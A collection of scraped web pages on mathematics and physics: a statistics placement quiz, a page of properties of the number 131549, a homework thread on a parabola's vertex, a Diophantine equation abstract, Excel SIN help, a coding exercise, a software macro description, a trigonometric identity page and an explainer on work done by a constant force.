"Complete the MSG1 multiple-choice quizzes to find out the training appropriate to you :\n\n 1. Which of the following statements are true? a. The median is the most frequently observed value. True False b. Half of the results are less than or equal to the median. True False c. On a small sample, the median is impacted by outliers True False d. The median and the mean are always very close. True False e. The median, second quartile, 5th decile and 50th percentile are always the same. True False 2. The following values were obtained: 12 – 6 – 12 – 8 – 10 a. What is the mean ? b. What is the median ? c. What is the mode ? d. What is the range ? 3. Which of the following statements are true? a.The 95% confidence interval associated to the mean indicates the interval in which the “true” mean has a 95% probability to be. True False b. The width of the confidence interval decreases as the sample size increases. True False c. The width of the confidence interval decreases as the alpha risk decreases (= as the probability increases). True False 4. Which of the following statements are true? a. The Pareto chart is used to display categorical variables in order of importance. True False b. The histogram is the most suitable plot to visualize the sample distribution. True False c. The scatterplot shows a potential correlation between 2 series of data True False d. The boxplot allows comparison of both the dispersions and the averages of several data sets. True False 5. 5. For Gaussian data (normal distribution), what is the theoretical percentage of the population in the range: mean ± 1.96* standard deviation a. 95 % b. 95,45 % c. 99 % d. 99,73 % 6. 4 dice are rolled simultaneously. The outcome is the sum of these dice and the experiment is repeated many times. What is the distribution associated to the sum? a. Binomial distribution b. Normal distribution c. Student’s distribution d. Fisher’s distribution\n\nWe recommend that you take the MSG1 or MSG2 courses to learn or review basic statistics.\n\nCongratulations, your level in basic statistics is sufficient to undertake more advanced training. Please complete this short questionnaire for some more advanced analytical methods.\n\nFill out the MSG2 MCQ to complete your assessment:\n\n 1. We wish to compare the means of 2 samples, with a risk of 5%. The calculated p-value is 0.231 (23.1%). In this case: a. We do not reject the null hypothesis, which is H0: m1 = m2 b. We do not reject the null hypothesis, which is H0: m1 ≠ m2 c. We reject the null hypothesis, and we retain the alternative hypothesis, which is H1: m1 = m2 d. We reject the null hypothesis, and we retain the alternative hypothesis which is H1: m1 ≠ m2 2. We wish to compare the means of 2 samples, with a risk of 5%. The calculated p-value is 0.231 (23.1%). How to formulate the conclusion? a. The statistical test shows equality between the means, with a risk of error lower than 5%. b. The statistical test does not reveal any differences between the means at the 5% level c. The statistical test shows a difference between the means, with a risk of error lower than 5%. d. The statistical test does not show equality between the means at the 5% threshold. 3. Biological measurements are made on the same patient before and after the application of a treatment. In statistics, the measurements are called: a. Paired b. Independent c. Jointed 4. . What is the name of the test in which H0: m1 < m2 versus H1: m1 > m2: a. The equivalence test for inferiority b. The one-tailed comparison test c. 
The signs test 5. We wish to compare the average marks obtained during an exam by students from 2 different schools; which statistical test should be applied? a. Fisher’s test b. Bartlett’s test c. The T-test, paired Student’s t test d. The T-test, independent Student’s t test e. The Chi-2 test f. Shapiro-Wilk’s test g. An ANOVA h. A Regression 6. We wish to compare the average marks obtained during an exam by students from 5 different schools; which statistical test should be applied? a. Fisher’s test b. Bartlett’s test c. The T-test, paired Student’s t test d. The T-test, independent Student’s t test e. The Chi-2 test f. Shapiro-Wilk’s test g. An ANOVA h. A Regression\n\n(A short script checking the arithmetic of question 2 in the first quiz appears after this record.)"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8534983,"math_prob":0.95742327,"size":4505,"snap":"2021-43-2021-49","text_gpt3_token_len":1191,"char_repetition_ratio":0.12797156,"word_repetition_ratio":0.24025974,"special_character_ratio":0.27436182,"punctuation_ratio":0.16597077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9956368,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-18T23:46:40Z\",\"WARC-Record-ID\":\"<urn:uuid:a190306a-6192-411c-a751-01c352eb4057>\",\"Content-Length\":\"157140\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:94ba0570-d146-4d45-83ec-62fdfc9f295f>\",\"WARC-Concurrent-To\":\"<urn:uuid:976c0206-2e27-4756-9197-2c7fd25ad924>\",\"WARC-IP-Address\":\"79.137.33.143\",\"WARC-Target-URI\":\"https://www.soladisinstitute.fr/en/evaluation/\",\"WARC-Payload-Digest\":\"sha1:IA5ADYOUKNN3ZSAKGBAGV22BSGBTDA7N\",\"WARC-Block-Digest\":\"sha1:KBO4QS2CLX562EIZWKZE5LT3CQEOIPN6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585215.14_warc_CC-MAIN-20211018221501-20211019011501-00497.warc.gz\"}"} |
https://metanumbers.com/131549 | [
"# 131549 (number)\n\n131,549 (one hundred thirty-one thousand five hundred forty-nine) is an odd six-digits composite number following 131548 and preceding 131550. In scientific notation, it is written as 1.31549 × 105. The sum of its digits is 23. It has a total of 2 prime factors and 4 positive divisors. There are 119,580 positive integers (up to 131549) that are relatively prime to 131549.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 6\n• Sum of Digits 23\n• Digital Root 5\n\n## Name\n\nShort name 131 thousand 549 one hundred thirty-one thousand five hundred forty-nine\n\n## Notation\n\nScientific notation 1.31549 × 105 131.549 × 103\n\n## Prime Factorization of 131549\n\nPrime Factorization 11 × 11959\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 2 Total number of prime factors rad(n) 131549 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 131,549 is 11 × 11959. Since it has a total of 2 prime factors, 131,549 is a composite number.\n\n## Divisors of 131549\n\n4 divisors\n\n Even divisors 0 4 2 2\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 4 Total number of the positive divisors of n σ(n) 143520 Sum of all the positive divisors of n s(n) 11971 Sum of the proper positive divisors of n A(n) 35880 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 362.697 Returns the nth root of the product of n divisors H(n) 3.66636 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 131,549 can be divided by 4 positive divisors (out of which 0 are even, and 4 are odd). The sum of these divisors (counting 131,549) is 143,520, the average is 35,880.\n\n## Other Arithmetic Functions (n = 131549)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 119580 Total number of positive integers not greater than n that are coprime to n λ(n) 59790 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 12259 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 119,580 positive integers (less than 131,549) that are coprime with 131,549. 
And there are approximately 12,259 prime numbers less than or equal to 131,549.\n\n## Divisibility of 131549\n\n m n mod m 2 3 4 5 6 7 8 9 1 2 1 4 5 5 5 5\n\n131,549 is not divisible by any number less than or equal to 9.\n\n## Classification of 131549\n\n• Arithmetic\n• Semiprime\n• Deficient\n\n### Expressible via specific sums\n\n• Polite\n• Non-hypotenuse\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (131549)\n\nBase System Value\n2 Binary 100000000111011101\n3 Ternary 20200110012\n4 Quaternary 200013131\n5 Quinary 13202144\n6 Senary 2453005\n8 Octal 400735\n10 Decimal 131549\n12 Duodecimal 64165\n20 Vigesimal g8h9\n36 Base36 2ti5\n\n## Basic calculations (n = 131549)\n\n### Multiplication\n\nn×y\n n×2 263098 394647 526196 657745\n\n### Division\n\nn÷y\n n÷2 65774.5 43849.7 32887.2 26309.8\n\n### Exponentiation\n\nny\n n2 17305139401 2276473783062149 299467849688042638801 39394696158612321091632749\n\n### Nth Root\n\ny√n\n 2√n 362.697 50.8584 19.0446 10.5637\n\n## 131549 as geometric shapes\n\n### Circle\n\n Diameter 263098 826547 5.43657e+10\n\n### Sphere\n\n Volume 9.53567e+15 2.17463e+11 826547\n\n### Square\n\nLength = n\n Perimeter 526196 1.73051e+10 186038\n\n### Cube\n\nLength = n\n Surface area 1.03831e+11 2.27647e+15 227850\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 394647 7.49335e+09 113925\n\n### Triangular Pyramid\n\nLength = n\n Surface area 2.99734e+10 2.68285e+14 107409\n\n## Cryptographic Hash Functions\n\nmd5 8c3bce39ca977e0f872b6d9fb3be8cfb 7af2573019c1cdc383b44f3d2d8f15b7d3db75ba b507435e416d62a9efb1ded418dc643b2a141786c00205f26cc276e63890bf58 65889f169cc8b106f8179b78bac0a8087ad0275c30f3ff6bb1fbcbe86366d8e5eebf7fc040b5a72c6e5d0c511601520f17f6924595134fbe8d69ae272b60fd30 f514b266c44d52ae5136e7e27ba3de3b36deb27f"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6104349,"math_prob":0.97534734,"size":4684,"snap":"2021-31-2021-39","text_gpt3_token_len":1640,"char_repetition_ratio":0.119444445,"word_repetition_ratio":0.03211679,"special_character_ratio":0.45239112,"punctuation_ratio":0.074589126,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T06:10:39Z\",\"WARC-Record-ID\":\"<urn:uuid:f9fd64a9-4b76-4a70-b9e9-ca6d4236fc38>\",\"Content-Length\":\"40105\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:083f26e5-d654-4944-b4b4-b4429ce01b1e>\",\"WARC-Concurrent-To\":\"<urn:uuid:e3893cc6-854a-46a9-873e-01c990922988>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/131549\",\"WARC-Payload-Digest\":\"sha1:IEU5FQVJIJ2LC6FMO3HF4ETUO57CRHXW\",\"WARC-Block-Digest\":\"sha1:ERW5IVQRYKXEBLVHKKALZRNF6IDVGLYH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057504.60_warc_CC-MAIN-20210924050055-20210924080055-00258.warc.gz\"}"} |
https://www.jiskha.com/questions/1074259/i-am-familiar-with-finding-the-vertex-of-a-polynomial-but-i-dont-know-how-to-solve-this | [
"# Math-Circles\n\nI am familiar with finding the vertex of a polynomial but I don't know how to solve this equation.\nGive the vertex of x^2+9\ncan you please explain in steps?\nThank you.\n\n1. 👍 0\n2. 👎 0\n3. 👁 103\n1. An equation requires an equal sign.\n\n1. 👍 0\n2. 👎 0\nposted by PsyDAG\n2. If you mean\n\ny = x^2+9\n\nyou can see that since x^2 can never be less than zero, the vertex is at x=0. Since y=9 there, the vertex is at (0,9)\n\nOr, recalling that the vertex of\n\ny = (x-h)^2 + k\n\nis at (h,k), note that we have h=0 and k=9.\n\n1. 👍 0\n2. 👎 0\nposted by Steve\n\n## Similar Questions\n\n1. ### algebra\n\nsolve the polynomial y=2x^2-4x+1 For Further Reading algebra - Reiny, Thursday, May 17, 2007 at 10:34pm I am sure neither your text nor your teacher asked you to \"solve the polynomial y=2x^2-4x+1 \" are you graphing the function,\n\nasked by Haylee on May 18, 2007\n2. ### Algebra II\n\nState the vertex of the graph: y=2x-6x+9 ...the 2x is squared. y = 2x^2 -6x + 9 The vertex is where the function is a minimum. That would be where dy/dx = 4x -6 = 0 x= 3/2 If you are not familiar with calculus, then rewrite the\n\nasked by Kate on March 29, 2007\n3. ### Algebra\n\nWrite an equation for the translation so the graph has the given vertex. 1. y=-|x| vertex (-5,0) 2. y=2|x| vertex (-4,3) 3. y=-|x| vertex (p,q) I really have no idea how to even begin these, but I do know the answer to # 2 is\n\nasked by Josie on October 5, 2006\n4. ### Math\n\nI need help in finding the vertex of a parabola using an equation in this form: Ax^2 + Bx+C I have a test on this tomorrow. For example: 3x^2 +1x - 2 How would I find the vertex in this?\n\nasked by Clair on December 8, 2009\n5. ### Math - Trigonometry\n\nLet f(x) be a polynomial such that f(cos theta) = cos(4 theta) for all \\theta. Find f(x). (This is essentially the same as finding cos(4 theta) in terms of cos theta; we structure the problem this way so that you can answer as a\n\nasked by Sam on November 6, 2013\n1. ### algebra\n\n1)Find the exact solutions to 3x^2=5x-1 using the quadratic formula. answer=5 plus or minus the square root of 37 over 6 2)Use the discriminant to determine the number and type of roots for the equation 2x^2-7x+9=0 answer=2\n\nasked by Marissa on August 14, 2007\n2. ### Math-precalc\n\nIs it possible to find a rational function that has x-intercepts (-2,0) and (2,0), but has vertical asymptote x=1 and horizontal asymptote of y=0? The horizontal asymptote and the x-intercepts parts stump me. If you can't reach\n\nasked by Pamela on July 7, 2007\n3. ### Algebra\n\nIdentify the vertex and the axis of symmetry for the graph of y=5(x-2)^2 + 3. a) vertex (2,3); x = -2 b) vertex (-2,-3); x = 2 c) vertex (2,3); x = 2 d) vertex (-2,-3); x = -2 I have no idea how to solve this problem! Please help.\n\nasked by Cassie on June 6, 2009\n4. ### Algebra Functions\n\nI cannot for the life of me remember how to do this- Find the vertex of the graphs of the functions: Function #1: y=(x-4)(x+2) AND Function #2: y=2x^2-4x+1 Can someone help me get it PLz! OK - to find the vertex of these functions\n\nasked by natalie on January 4, 2007\n5. ### Precalculus(Please check and help)\n\nFind the Equation. Please check the answers and help. Thanks! 1.) Ellipse with center (0,0), foci on x-axis; x intercepts; major axis of length 12, minor acis of length 8. I got : x^2/144 + y^2/64 = 1 2.) A parabola with vertex\n\nasked by Ram on May 1, 2016\n\nMore Similar Questions"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89669216,"math_prob":0.9776818,"size":2828,"snap":"2020-10-2020-16","text_gpt3_token_len":965,"char_repetition_ratio":0.12818697,"word_repetition_ratio":0.021857923,"special_character_ratio":0.3373409,"punctuation_ratio":0.10785824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975544,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-30T03:33:34Z\",\"WARC-Record-ID\":\"<urn:uuid:7c0e297c-6a0f-4bf3-93be-5fab7f816c66>\",\"Content-Length\":\"23491\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0fba400c-ba89-4672-9607-6b273e226add>\",\"WARC-Concurrent-To\":\"<urn:uuid:d50bc183-7b0a-48ff-8e1c-3f4a9612f289>\",\"WARC-IP-Address\":\"66.228.55.50\",\"WARC-Target-URI\":\"https://www.jiskha.com/questions/1074259/i-am-familiar-with-finding-the-vertex-of-a-polynomial-but-i-dont-know-how-to-solve-this\",\"WARC-Payload-Digest\":\"sha1:XDCWEUO6FX4QYYDJS74GUNFZQJB4TIKM\",\"WARC-Block-Digest\":\"sha1:DR7AAM5BVGEOYYXNS3YCSR6FW54VE76Z\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370496523.5_warc_CC-MAIN-20200330023050-20200330053050-00091.warc.gz\"}"} |
https://www.projecteuclid.org/journals/proceedings-of-the-japan-academy-series-a-mathematical-sciences/volume-76/issue-2/On-the-Diophantine-equation-xx--1-dotsm-x-/10.3792/pjaa.76.16.full | [
"Feb. 2000 On the Diophantine equation $x(x + 1) \\dotsm (x + n) + 1 = y^2$\nNobuhisa Abe\nProc. Japan Acad. Ser. A Math. Sci. 76(2): 16-17 (Feb. 2000). DOI: 10.3792/pjaa.76.16\n\n## Abstract\n\nLet $\\mathbf{N}$ denote the set of natural numbers $\\{1, 2, 3, \\ldots\\}$. $n$ being an odd natural number, we consider the Diophantine equation as mentioned in the title and solve it completely for $n \\leq 15$, i.e. find all $(x,y) \\in \\mathbf{N}^2$ satisfying this equation.\n\n## Citation\n\nNobuhisa Abe. \"On the Diophantine equation $x(x + 1) \\dotsm (x + n) + 1 = y^2$.\" Proc. Japan Acad. Ser. A Math. Sci. 76 (2) 16 - 17, Feb. 2000. https://doi.org/10.3792/pjaa.76.16\n\n## Information\n\nPublished: Feb. 2000\nFirst available in Project Euclid: 23 May 2006\n\nzbMATH: 0996.11022\nMathSciNet: MR1752817\nDigital Object Identifier: 10.3792/pjaa.76.16\n\nSubjects:\nPrimary: 11D\n\nKeywords: Diophantine equation",
null,
""
] | [
null,
"https://www.projecteuclid.org/images/journals/cover_pja.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.63816994,"math_prob":0.9779286,"size":484,"snap":"2023-40-2023-50","text_gpt3_token_len":176,"char_repetition_ratio":0.10208333,"word_repetition_ratio":0.0,"special_character_ratio":0.37396693,"punctuation_ratio":0.21929824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974466,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T18:57:12Z\",\"WARC-Record-ID\":\"<urn:uuid:cdc5f784-1553-42af-bacc-ccb725b4701b>\",\"Content-Length\":\"135082\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c8d692c-b3b9-4503-9a1c-14b9f7a1531b>\",\"WARC-Concurrent-To\":\"<urn:uuid:138e4135-185d-46fd-adf5-d018c913f8a6>\",\"WARC-IP-Address\":\"107.154.79.145\",\"WARC-Target-URI\":\"https://www.projecteuclid.org/journals/proceedings-of-the-japan-academy-series-a-mathematical-sciences/volume-76/issue-2/On-the-Diophantine-equation-xx--1-dotsm-x-/10.3792/pjaa.76.16.full\",\"WARC-Payload-Digest\":\"sha1:NCQQLER7N3DA7OEDH6QOGP7JJMHWLT6M\",\"WARC-Block-Digest\":\"sha1:OGPYKP2CJIEUI4UYKMCPKNBJQOMWGMCK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100135.11_warc_CC-MAIN-20231129173017-20231129203017-00398.warc.gz\"}"} |
https://support.microsoft.com/en-us/office/sin-function-83163832-688f-4ae5-affc-e3c385b09228?ocmsassetid=ha001161065&queryid=0bd7df57-e635-4f0a-9bbb-3b0bddaea6c9&respos=48&ctt=1&correlationid=8ec29154-eaaa-4ca2-bcee-63b02e6bee20&ui=en-us&rs=en-us&ad=us | [
"Returns the sine of the given angle.\n\n## Syntax\n\nSIN(number)\n\nNumber is the angle in radians for which you want the sine.\n\n## Remark\n\nIf your argument is in degrees, multiply it by PI()/180 or use the RADIANS function to convert it to radians.\n\n## Examples\n\n Formula Description (Result) =SIN(PI()) Sine of pi radians (0, approximately) =SIN(PI()/2) Sine of pi/2 radians (1) =SIN(30*PI()/180) Sine of 30 degrees (0.5) =SIN(RADIANS(30)) Sine of 30 degrees (0.5)"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.70012647,"math_prob":0.99348974,"size":463,"snap":"2021-31-2021-39","text_gpt3_token_len":144,"char_repetition_ratio":0.16557734,"word_repetition_ratio":0.077922076,"special_character_ratio":0.3412527,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999696,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T21:22:10Z\",\"WARC-Record-ID\":\"<urn:uuid:c7dc15ec-864e-42a1-8474-1ea09f480995>\",\"Content-Length\":\"108568\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5acd928e-3167-4cfc-8dbe-6f3e5da65cb9>\",\"WARC-Concurrent-To\":\"<urn:uuid:c160cf2f-75a3-4c97-9a43-517173bab6a9>\",\"WARC-IP-Address\":\"23.62.164.116\",\"WARC-Target-URI\":\"https://support.microsoft.com/en-us/office/sin-function-83163832-688f-4ae5-affc-e3c385b09228?ocmsassetid=ha001161065&queryid=0bd7df57-e635-4f0a-9bbb-3b0bddaea6c9&respos=48&ctt=1&correlationid=8ec29154-eaaa-4ca2-bcee-63b02e6bee20&ui=en-us&rs=en-us&ad=us\",\"WARC-Payload-Digest\":\"sha1:VOI44ZNIFA2AY22C6J42B3JUBNKSNEEJ\",\"WARC-Block-Digest\":\"sha1:BTQZGSXI74A2NCMIL6BTIVP7RFGR6ZAB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057580.39_warc_CC-MAIN-20210924201616-20210924231616-00393.warc.gz\"}"} |
https://www.eolymp.com/en/problems/8638 | [
"",
null,
"Problems\n\n# Append three\n\nTime limit 1 second\nMemory limit 128 MiB\n\nThree digit number n is given. Append to it the digit 3 from the left and from the right.\n\n## Input data\n\nOne three digit number n.\n\n## Output data\n\nAppend to the number n the digit 3 from the left and from the right. Print the resulting number.\n\n## Examples\n\nInput example #1\n345\n\nOutput example #1\n33453\n\nInput example #2\n800\n\nOutput example #2\n38003"
] | [
null,
"https://www.eolymp.com/images/eolymp-inverse.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.64226913,"math_prob":0.98073506,"size":369,"snap":"2023-40-2023-50","text_gpt3_token_len":96,"char_repetition_ratio":0.16986302,"word_repetition_ratio":0.18461539,"special_character_ratio":0.2682927,"punctuation_ratio":0.067567565,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9827818,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-22T15:06:26Z\",\"WARC-Record-ID\":\"<urn:uuid:1bbea8f0-8eba-430e-b523-8416d53c793b>\",\"Content-Length\":\"10086\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae305876-d8aa-42ef-8c74-3f27bace27c7>\",\"WARC-Concurrent-To\":\"<urn:uuid:de37e524-1be1-4112-a6cc-c3b3c26142ae>\",\"WARC-IP-Address\":\"3.66.181.58\",\"WARC-Target-URI\":\"https://www.eolymp.com/en/problems/8638\",\"WARC-Payload-Digest\":\"sha1:SYXLHN5FN4QFRKFE7DNT57RHVFHD255C\",\"WARC-Block-Digest\":\"sha1:2M3HJ7TNY5RCXPAZQAD243DNC6XX6ECU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506420.84_warc_CC-MAIN-20230922134342-20230922164342-00331.warc.gz\"}"} |
https://help.altair.com/flux/Flux/Help/english/Macros/english/topics/findoutcornerpoint_imax_angle_r.htm | [
"# FindOutCornerPoint_Imax_Angle.PFM\n\n## Description\n\nFind out the corner point of the torque vs speed curve starting from an unresolved Flux project.\n\n## Input\n\n• Current source\n• Value of Imax\n• Value of SpeedMin\n• Value of SpeedMax\n• The step value of the speed\n• Value of the Vrms max of the inverter\n• Solving scenario\n• The user's defined variation parameter for speed\n• The user's defined variation parameter for the angle\n• The user's defined variation parameter for the maximal current\n• Value of AngleMin\n• Value of AngleMax\n• The step value of the angle\n• The extension of the name of the file (for example \"solved\")\n\n## Output\n\n• Variation parameter containing the corresponding speed to Vrms max"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5478315,"math_prob":0.7565061,"size":690,"snap":"2023-14-2023-23","text_gpt3_token_len":163,"char_repetition_ratio":0.18658893,"word_repetition_ratio":0.13043478,"special_character_ratio":0.20869565,"punctuation_ratio":0.018691588,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9826005,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T19:03:09Z\",\"WARC-Record-ID\":\"<urn:uuid:0448a8f3-59eb-4a1d-a0b5-6aa37242d468>\",\"Content-Length\":\"83917\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:35181597-8d01-478d-ada6-1f5c4c49ac85>\",\"WARC-Concurrent-To\":\"<urn:uuid:ecca5fc7-b9c3-46e8-9125-a32970889750>\",\"WARC-IP-Address\":\"173.225.177.121\",\"WARC-Target-URI\":\"https://help.altair.com/flux/Flux/Help/english/Macros/english/topics/findoutcornerpoint_imax_angle_r.htm\",\"WARC-Payload-Digest\":\"sha1:WWPRVQLQBMZ364GOOGCZCRZZ2BKDTSHM\",\"WARC-Block-Digest\":\"sha1:H22PVJNRG3XDKK4IZV6CKIQ7MXZQG7PZ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949678.39_warc_CC-MAIN-20230331175950-20230331205950-00091.warc.gz\"}"} |
https://uniteasy.com/formula/29/ | [
" Cosine of the difference of two angles formula\n\n# Cosine of the difference of two angles formula\n\ncdta\nTrigonometry\n\nCosine of the difference of two angles is equal to the product of cosine of the two angles plus the product of sine of the two angles.\n\n\\cos(\\alpha -\\beta ) = \\cos \\alpha\\cos \\beta +\\sin \\alpha \\sin \\beta\n\nor\n\nScroll to Top"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8108173,"math_prob":0.99799055,"size":224,"snap":"2021-31-2021-39","text_gpt3_token_len":64,"char_repetition_ratio":0.18181819,"word_repetition_ratio":0.0,"special_character_ratio":0.2544643,"punctuation_ratio":0.023809524,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99989045,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-23T12:32:10Z\",\"WARC-Record-ID\":\"<urn:uuid:13c42e0a-bb9d-4f9e-9347-1bb765271a8f>\",\"Content-Length\":\"9947\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e45adee7-d9e3-48b3-88ff-7b158d57e526>\",\"WARC-Concurrent-To\":\"<urn:uuid:9891c184-2867-4ff9-9c8a-27ee85440f76>\",\"WARC-IP-Address\":\"162.248.50.175\",\"WARC-Target-URI\":\"https://uniteasy.com/formula/29/\",\"WARC-Payload-Digest\":\"sha1:QYLPLY3OS2ONGWPQOX667LDCP3SPUSQS\",\"WARC-Block-Digest\":\"sha1:T6O5PB3RWDKMI5LRHGHMTSTIJQV2ZZUM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057421.82_warc_CC-MAIN-20210923104706-20210923134706-00553.warc.gz\"}"} |
https://qsstudy.com/work-done-constant-force/ | [
"Physics\n\n# Work done by a Constant Force",
null,
"Work done by a Constant Force\n\nThe work done by a constant force is proportional to the force applied times the displacement of the object. A force does not have to, and rarely does, act on an object parallel to the direction of motion.\n\nA body can be raised above or lowered down by small amount in the sphere of gravitational force. Since the height is small, so we can consider gravitational force constant. (F = mg, as g is constant, so F is constant.)\n\nThat means, if the magnitude and direction of the force is not changed, then that force is called constant force.\n\nLet a force F be applied at point A of a body along AB and due to this the body moving from point A to point B coven a distances [fig-a]. Then,\n\nWork done = magnitude of the force x magnitude of displacement along the point of action of the force\n\nor, W = F x s\n\nIf due to the application of force the displacement of the body i.e., the point of actions of the force to apposite to the direction of force i.e., AB = s [Fig-b], then,",
null,
"Work done = magnitude of the force x magnitude of displacement along the direction of the force.\n\nor, W = F x (-s) = – F x s\n\nNegative sign is used to indicate that force and displacement are opposite to each other.\n\nNow, consider that due to the action of force F on a body along direction AB, the body reaches to point C covering a distance s making an angle θ with the direction of the applied force [Fig- c]. Then displacement of the body along the line of action of the force = AB = s cos θ.\n\nHere, BC ┴ AB\n\nWork done, W = magnitude of force x magnitude of displacement along the direction of force\n\nor, W = Fs cos θ\n\n= magnitude of force x component of displacement along the line of action of the force\n\n= magnitude of displacement x component of force along the direction of force.",
null,
"Work can be expressed by vector algebra as:\n\nWork is measured by the scalar product of two vectors, force and displacement.\n\nSuppose, force F is a vector quantity and displacement ‘s’ is also a vector quantity.\n\nSo, work = force x displacement\n\nor, W = F. s\n\n= s . F = Fs cos θ,\n\n[s cos θ is the component of displacement along the direction of force, F]\n\nHere, θ = angle between F and s."
] | [
null,
"https://qsstudy.com/wp-content/uploads/2017/06/Work-done-by-a-Constant-Force.jpg",
null,
"https://qsstudy.com/wp-content/uploads/2017/06/Work-done-by-a-Constant-Force-1.jpg",
null,
"https://qsstudy.com/wp-content/uploads/2017/06/Work-done-by-a-Constant-Force-2.jpg",
null
